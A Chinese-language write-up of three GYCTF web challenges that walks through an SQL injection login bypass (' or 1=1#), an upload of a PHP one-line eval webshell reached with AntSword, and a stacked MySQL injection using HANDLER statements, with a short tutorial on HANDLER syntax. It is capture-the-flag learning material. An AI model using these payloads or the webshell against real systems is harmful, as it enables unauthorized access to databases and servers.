GYCTF

简单的招聘系统

登录页面存在二次注入,在username一栏填入’or 1=1#就可以以admin身份登录(必须处于未注册状态才可行).以admin身份登陆后,进入blank(全名忘了)页面,有一栏search,在search栏利用admin的数字key进行insert报错注入.(当然也可以用sqlmap一把梭).

ezupload

官方题解发出来才发现我的做法是非预期…
打开是一个上传文件的页面,bp抓包之后直接传了一句话木马的php文件,一句话木马内容:<?php @eval($_POST['pass']); ?>,上传成功后使用蚁剑连接,根目录有一个readflag程序,使用蚁剑自带的虚拟终端运行该程序即可.
附上预期解:

本题考查apache ssi rce 漏洞。
访问题目首页是一个文件上传，可通过上传shtml来生成php一句话木马

blacklist

本题改编自2019强网杯随便注,但过滤了rename,set等,所以原题做法不可行,但前面部分payload还是可以照抄的.BUUCTF-Web-随便注(三种解题思路)一直查询到字段之后,就需要换别的方式来解出本题了.由于本题数据库为mysql,所以我们可以使用handler语句.

以下内容出自右边文章:mysql查询语句-handler

handler语句简介

mysql除可使用select查询表中的数据，也可使用handler语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不具备select语句的所有功能。它是mysql专用的语句，并没有包含到SQL标准中。
HANDLER语句提供通往表的直接通道的存储引擎接口，可以用于MyISAM和InnoDB表.

基础语法

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

通过HANDLER tbl_name OPEN打开一张表，无返回结果，实际上我们在这里声明了一个名为tb1_name的句柄。
通过HANDLER tbl_name READ FIRST获取句柄的第一行，通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的句柄。

通过索引去查看的话可以按照一定的顺序，获取表中的数据。
通过HANDLER tbl_name READ index_name FIRST，获取句柄第一行（索引最小的一行），NEXT获取下一行，PREV获取前一行，LAST获取最后一行（索引最大的一行）。

通过索引列指定一个值，可以指定从哪一行开始。
通过HANDLER tbl_name READ index_name = value，指定从哪一行开始，通过NEXT继续浏览。

如果我们不想浏览一个表的所有行，可以使用where和limit子句。
回到题目
通过handler语句我们可以构造payload:1';handler FlagHere open;handler FlagHere read first;#如此即可获得flag.

废话part:不会的题目很多,希望下次能做出更多题.